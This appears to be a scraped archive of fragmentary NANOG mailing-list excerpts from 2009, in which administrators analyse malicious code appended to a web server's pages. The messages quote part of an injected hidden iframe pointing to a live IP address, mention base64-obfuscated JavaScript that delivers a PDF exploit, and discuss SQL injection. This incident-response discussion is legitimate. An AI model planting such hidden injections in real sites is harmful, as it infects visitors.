On 21/04/2009, at 5:23 AM, Mike Lewinski wrote:
Paul Ferguson wrote:
Most likely SQL injection. At any given time, there are hundreds of
thousands of "legitimate" websites out there that are unwittingly harboring
malicious code.
Most of the MS-SQL injection attacks we see write malicious
> Date: Mon, 20 Apr 2009 10:52:57 -0700
> From: Paul Ferguson
>
> On Mon, Apr 20, 2009 at 10:40 AM, Nick Chapman
> wrote:
>
> > On Mon, Apr 20, 2009 at 12:47 PM, Neil wrote:
>
> >>
> >> But if you figure out how they got write access to a static website, I'd
> >> love to hear it.
> >
> >
> >
From: Mike Lewinski [mailto:m...@rockynet.com]
Sent: Monday, April 20, 2009 11:23 AM
To: nanog@nanog.org
Subject: Re: Malicious code just found on web server
Paul Ferguson wrote:
> Most likely SQL injection. At any given time, there are hundreds of
> thousands of "legitimate" website
Ingo Flaschberger wrote:
Hi,
I see this every day at my webservers with a lot of *outdated*
*exploitable* customer websites [I love old joomla's];
but mod_security does a great job nuking sql and various other exploits.
mod_security saves our collective behinds every day at nearly every very
Hi,
I see this every day at my webservers with a lot of *outdated*
*exploitable* customer websites [I love old joomla's];
but mod_security does a great job nuking sql and various other exploits.
Kind regards,
Ingo Flaschberger
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1
On Mon, Apr 20, 2009 at 10:40 AM, Nick Chapman
wrote:
> On Mon, Apr 20, 2009 at 12:47 PM, Neil wrote:
>>
>> But if you figure out how they got write access to a static website, I'd
>> love to hear it.
>
>
> Compromised FTP credentials would be my g
Mike Lewinski wrote:
Paul Ferguson wrote:
Most likely SQL injection. At any given time, there are hundreds of
thousands of "legitimate" websites out there that are unwittingly harboring
malicious code.
Most of the MS-SQL injection attacks we see write malicious javascript
into the DB itsel
On Mon, Apr 20, 2009 at 12:47 PM, Neil wrote:
> I've run into this sort of attack before, where they change the page to load
> content from elsewhere; but I couldn't figure out how they managed to write
> to the sites' pages. They were hosted on a commercial webhost, and so if it
> was a comprom
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1
On Mon, Apr 20, 2009 at 10:23 AM, Mike Lewinski wrote:
> Paul Ferguson wrote:
>
>> Most likely SQL injection. At any given time, there are hundreds of
>> thousands of "legitimate" websites out there that are unwittingly harboring
>> malicious code
Paul Ferguson wrote:
Most likely SQL injection. At any given time, there are hundreds of
thousands of "legitimate" websites out there that are unwittingly harboring
malicious code.
Most of the MS-SQL injection attacks we see write malicious javascript
into the DB itself so all query results i
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1
On Mon, Apr 20, 2009 at 9:47 AM, Neil wrote:
> I've run into this sort of attack before, where they change the page to
> load content from elsewhere; but I couldn't figure out how they managed
> to write to the sites' pages. They were hosted on a co
On Fri, Apr 17, 2009 at 4:39 PM, Russell Berg wrote:
> We just discovered what we suspect is malicious code appended to all
> index.html files on our web server as of the 11:00 central time hour today:
>
> src="http://77.92.158.122/webmail/inc/web/index.php";
> style="display: none;" height="0" w
On Mon, Apr 20, 2009 at 10:42 AM, Jake Mailinglists
wrote:
> Paul,
> I noticed that in the PDF file but as the domain doesn't seem to have
> resolution I didn't mention it.
>
> Jake
>
> WHOIS information on the domain
>
> Whois Record
>
> domain: TEST1.RU
> type: CORPORATE
> nserver:
Paul,
I noticed that in the PDF file but as the domain doesn't seem to have
resolution I didn't mention it.
Jake
WHOIS information on the domain
Whois Record
domain: TEST1.RU
type: CORPORATE
nserver:ns1.centerhost.ru.
nserver:ns1.cetis.ru.
state: REGISTERED, DELEGATED
org
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1
On Fri, Apr 17, 2009 at 3:06 PM, Chris Mills wrote:
>> I took a quick look at the code... formatted it in a pastebin here:
>> http://pastebin.com/m7b50be54
>>
>> That javascript writes this to the page (URL obscured):
>> document.write("> src=\"hXX
Nice, bad code is actually on all of the error (404) pages for the site as
well as some other php pages.
The code is actually a base64 obfuscation technique to hide the actual
attack code.
Once decoded, the code attempts multiple attacks to try and get the victim to
download an executable
hxxp://
You beat me to it.
-ChrisAM
On Fri, Apr 17, 2009 at 6:31 PM, Paul Ferguson wrote:
> -BEGIN PGP SIGNED MESSAGE-
> Hash: SHA1
>
> On Fri, Apr 17, 2009 at 3:15 PM, Paul Ferguson
> wrote:
>
>>
>> On Fri, Apr 17, 2009 at 3:06 PM, Chris Mills
>> wrote:
>>
>>> I took a quick look at the code.
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1
On Fri, Apr 17, 2009 at 3:15 PM, Paul Ferguson
wrote:
>
> On Fri, Apr 17, 2009 at 3:06 PM, Chris Mills
> wrote:
>
>> I took a quick look at the code... formatted it in a pastebin here:
>> http://pastebin.com/m7b50be54
>>
>> That javascript writes th
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1
On Fri, Apr 17, 2009 at 3:06 PM, Chris Mills wrote:
> I took a quick look at the code... formatted it in a pastebin here:
> http://pastebin.com/m7b50be54
>
> That javascript writes this to the page (URL obscured):
> document.write(" src=\"hXXp://77.9
I took a quick look at the code... formatted it in a pastebin here:
http://pastebin.com/m7b50be54
That javascript writes this to the page (URL obscured):
document.write("");
The 1.2.3.4 in the URL is my public IP address (I changed that).
Below the javascript, it grabs a PDF:
That PDF is on th
FWIW, 77.92.158.122 resolves to mail.yarisfest.com, not mail.yaris.com
-Original Message-
From: Russell Berg
Sent: Friday, April 17, 2009 3:39 PM
To: 'nanog@nanog.org'
Subject: Malicious code just found on web server
We just discovered what we suspect is malicious code appended to all in